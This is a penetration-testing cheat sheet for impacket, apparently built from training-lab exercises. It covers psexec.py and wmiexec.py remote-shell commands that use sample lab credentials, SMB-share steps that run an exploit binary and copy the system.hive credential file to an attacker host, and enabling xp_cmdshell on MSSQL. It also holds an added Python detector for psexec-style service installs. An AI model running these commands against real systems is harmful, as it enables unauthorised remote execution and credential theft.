
impacket

Installation


git clone https://github.com/SecureAuthCorp/impacket.git /opt/tools/impacket
cd /opt/tools/impacket/
python3 -m pip install .
pip3 install -r requirements.txt
# alternatives to the pip install above:
#pip3 install .
#python3 setup.py install
# if the install fails because pip itself is too old:
# pip3 install --upgrade pip

psexec.py


Psexec.py is a clone of the Sysinternals psexec executable, but works slightly differently from the original. The tool creates a remote service by uploading a randomly-named executable to the ADMIN$ share on the target host. It then registers the service via RPC and the Windows Service Control Manager. Once established, communication happens over a named pipe, providing an interactive remote shell as SYSTEM on the victim host.

/opt/tools/impacket/examples/psexec.py $DOMAIN/$USER:$PASS@$IP
# /opt/tools/impacket/examples/psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125
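The footprint described above (a random-looking binary dropped at the ADMIN$ root, registered as a service and run as SYSTEM) is what shows up in the System log as Event ID 7045. The following detection logic is an added example, not part of this page or of impacket: it scores constructed 7045 records on those indicators; the randomness heuristic, its thresholds and the sample values are assumptions of the example.

```python
import re
from collections import Counter
from math import log2

# Constructed records modelled on System log Event ID 7045 ("A service was installed
# in the system"); field names follow the event's EventData, the values are made up.
SAMPLE_7045 = [
    {"ServiceName": "gupdate", "AccountName": "LocalSystem",
     "ImagePath": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc"},
    {"ServiceName": "Spooler", "AccountName": "LocalSystem",
     "ImagePath": r"%SystemRoot%\System32\spoolsv.exe"},
    {"ServiceName": "dGpC", "AccountName": "LocalSystem",
     "ImagePath": r"%SystemRoot%\bKqZwRtL.exe"},
    {"ServiceName": "Backup", "AccountName": r"NT AUTHORITY\LocalService",
     "ImagePath": r"C:\Windows\backupagent.exe"},
]

# ADMIN$ is the Windows directory itself, so an uploaded binary sits directly under it.
WINDOWS_ROOT_EXE = re.compile(r"^(?:%SystemRoot%|C:\\Windows)\\([^\\\s]+\.exe)\b", re.I)

def shannon_entropy(text):
    counts = Counter(text)
    return -sum(c / len(text) * log2(c / len(text)) for c in counts.values())

def looks_generated(stem):
    # Heuristic (an assumption of this example): letters only, mixed case and high
    # character entropy reads like a generated name rather than a product name.
    return (stem.isalpha() and not stem.islower() and not stem.isupper()
            and shannon_entropy(stem.lower()) >= 2.5)

def flag_psexec_like(event):
    """Reasons a 7045 event resembles a psexec.py service install (empty if none)."""
    match = WINDOWS_ROOT_EXE.match(event["ImagePath"])
    if not match:
        return []
    binary = match.group(1)
    reasons = [f"binary {binary} sits directly in the Windows root (ADMIN$)"]
    if looks_generated(binary.rsplit(".", 1)[0]):
        reasons.append("binary name looks randomly generated")
    if len(event["ServiceName"]) <= 4 and event["ServiceName"].isalpha():
        reasons.append(f"short service name {event['ServiceName']}")
    if event["AccountName"].lower().endswith("localsystem"):
        reasons.append("service runs as LocalSystem, i.e. a SYSTEM shell")
    return reasons

def suspicious_service_installs(events, min_reasons=3):
    # Indicators must coincide so a vendor agent in the Windows root alone does not fire.
    scored = ((e["ServiceName"], flag_psexec_like(e)) for e in events)
    return {name: reasons for name, reasons in scored if len(reasons) >= min_reasons}
```

Feed real 7045 events (for example exported with wevtutil or from a SIEM) into suspicious_service_installs() and tune min_reasons to the environment's baseline.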

wmiexec.py


Wmiexec.py utilizes a semi-interactive shell where commands are executed through Windows Management Instrumentation. It does not drop any files or executables on the target host and generates fewer logs than other modules. After connecting, it runs as the local admin user we connected with (this can be less obvious to someone hunting for an intrusion than seeing SYSTEM executing many commands). This is a more stealthy approach to execution on hosts than other tools, but would still likely be caught by most modern anti-virus and EDR systems. We will use the same account as with psexec.py to access the host.

/opt/tools/impacket/examples/wmiexec.py $DOMAIN/$USER:$PASS@$IP
# wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5

smbserver.py - Samba local server


Set up the SMB server (Kali):

mkdir share
/opt/tools/impacket/examples/smbserver.py -smb2support public share
/opt/tools/impacket/examples/smbserver.py public .
/opt/tools/impacket/examples/smbserver.py -smb2support public .
# If the Windows client reports "You can't access this shared folder because your organization's security policy blocks unauthenticated guest access", start the server with credentials instead:
/opt/tools/impacket/examples/smbserver.py -smb2support -username $USER -password $PASS public .
# /opt/tools/impacket/examples/smbserver.py -smb2support -username 'thm' -password 'Passw0rd!' public .
# /opt/tools/impacket/examples/smbserver.py -smb2support -username 'htb-student' -password 'Academy_student_AD!' public .

Execute a binary on Windows straight from the share:
//<KALI_IP>/public/ms11-046.exe
//<KALI_IP>/public/accesschk.exe -uwdq "C:\Program Files\Unquoted Path Service\"

Copy a file from Windows to Kali:
copy C:\Users\admin\Desktop\system.hive \\<KALI_IP>\public\

Copy a file from Kali to Windows:
copy \\<KALI_IP>\public\accesschk.exe C:\admin\Desktop\accesschk.exe

mssqlclient.py

mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth
SQL> help
SQL> enable_xp_cmdshell
xp_cmdshell whoami /priv